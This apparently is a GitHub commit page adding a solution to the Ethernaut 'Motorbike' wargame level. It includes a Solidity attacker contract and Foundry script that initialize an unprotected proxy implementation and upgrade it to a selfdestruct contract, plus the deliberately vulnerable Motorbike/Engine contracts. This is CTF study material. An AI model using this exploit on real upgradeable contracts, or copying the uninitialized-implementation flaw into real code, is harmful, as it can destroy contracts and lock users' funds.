-
Notifications
You must be signed in to change notification settings - Fork 115
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
3 changed files
with
210 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity <0.7.0; | ||
|
||
import {Script, console} from "forge-std/Script.sol"; | ||
import {Motorbike, Engine} from "../src/Level25.sol"; | ||
|
||
contract Attacker { | ||
Motorbike motorbike; | ||
Engine engine; | ||
Destructive destructive; | ||
|
||
constructor(address motorbikeAddr, address engineAddr) public { | ||
motorbike = Motorbike(payable(motorbikeAddr)); | ||
engine = Engine(engineAddr); | ||
destructive = new Destructive(); | ||
} | ||
|
||
function attack() external { | ||
engine.initialize(); | ||
bytes memory encodedData = abi.encodeWithSignature("killed()"); | ||
engine.upgradeToAndCall(address(destructive), encodedData); | ||
} | ||
} | ||
|
||
contract Destructive { | ||
function killed() external { | ||
selfdestruct(address(0)); | ||
} | ||
} | ||
|
||
contract CallContractScript is Script { | ||
function run() external { | ||
// 指定私钥,可以从环境变量中获取,例如:process.env.PRIVATE_KEY | ||
uint256 privateKey = vm.envUint("PRIVATE_KEY"); | ||
|
||
// 初始化一个签名者 | ||
vm.startBroadcast(privateKey); | ||
|
||
address levelAddr = 0x082198127b7d7adf8D3f035599F15D78C1C0f665; | ||
address engineAddr = address( | ||
uint160( | ||
uint256( | ||
vm.load( | ||
address(levelAddr), | ||
0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc | ||
) | ||
) | ||
) | ||
); | ||
|
||
Attacker attacker = new Attacker(levelAddr, engineAddr); | ||
|
||
attacker.attack(); | ||
|
||
vm.stopBroadcast(); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,99 @@ | ||
// SPDX-License-Identifier: MIT | ||
|
||
pragma solidity <0.7.0; | ||
|
||
import "openzeppelin-contracts-06/utils/Address.sol"; | ||
import "openzeppelin-contracts-06/proxy/Initializable.sol"; | ||
|
||
contract Motorbike { | ||
// keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1 | ||
bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc; | ||
|
||
struct AddressSlot { | ||
address value; | ||
} | ||
|
||
// Initializes the upgradeable proxy with an initial implementation specified by `_logic`. | ||
constructor(address _logic) public { | ||
require(Address.isContract(_logic), "ERC1967: new implementation is not a contract"); | ||
_getAddressSlot(_IMPLEMENTATION_SLOT).value = _logic; | ||
(bool success,) = _logic.delegatecall(abi.encodeWithSignature("initialize()")); | ||
require(success, "Call failed"); | ||
} | ||
|
||
// Delegates the current call to `implementation`. | ||
function _delegate(address implementation) internal virtual { | ||
// solhint-disable-next-line no-inline-assembly | ||
assembly { | ||
calldatacopy(0, 0, calldatasize()) | ||
let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0) | ||
returndatacopy(0, 0, returndatasize()) | ||
switch result | ||
case 0 { revert(0, returndatasize()) } | ||
default { return(0, returndatasize()) } | ||
} | ||
} | ||
|
||
// Fallback function that delegates calls to the address returned by `_implementation()`. | ||
// Will run if no other function in the contract matches the call data | ||
fallback() external payable virtual { | ||
_delegate(_getAddressSlot(_IMPLEMENTATION_SLOT).value); | ||
} | ||
|
||
// Returns an `AddressSlot` with member `value` located at `slot`. | ||
function _getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) { | ||
assembly { | ||
r_slot := slot | ||
} | ||
} | ||
} | ||
|
||
contract Engine is Initializable { | ||
// keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1 | ||
bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc; | ||
|
||
address public upgrader; | ||
uint256 public horsePower; | ||
|
||
struct AddressSlot { | ||
address value; | ||
} | ||
|
||
function initialize() external initializer { | ||
horsePower = 1000; | ||
upgrader = msg.sender; | ||
} | ||
|
||
// Upgrade the implementation of the proxy to `newImplementation` | ||
// subsequently execute the function call | ||
function upgradeToAndCall(address newImplementation, bytes memory data) external payable { | ||
_authorizeUpgrade(); | ||
_upgradeToAndCall(newImplementation, data); | ||
} | ||
|
||
// Restrict to upgrader role | ||
function _authorizeUpgrade() internal view { | ||
require(msg.sender == upgrader, "Can't upgrade"); | ||
} | ||
|
||
// Perform implementation upgrade with security checks for UUPS proxies, and additional setup call. | ||
function _upgradeToAndCall(address newImplementation, bytes memory data) internal { | ||
// Initial upgrade and setup call | ||
_setImplementation(newImplementation); | ||
if (data.length > 0) { | ||
(bool success,) = newImplementation.delegatecall(data); | ||
require(success, "Call failed"); | ||
} | ||
} | ||
|
||
// Stores a new address in the EIP1967 implementation slot. | ||
function _setImplementation(address newImplementation) private { | ||
require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract"); | ||
|
||
AddressSlot storage r; | ||
assembly { | ||
r_slot := _IMPLEMENTATION_SLOT | ||
} | ||
r.value = newImplementation; | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters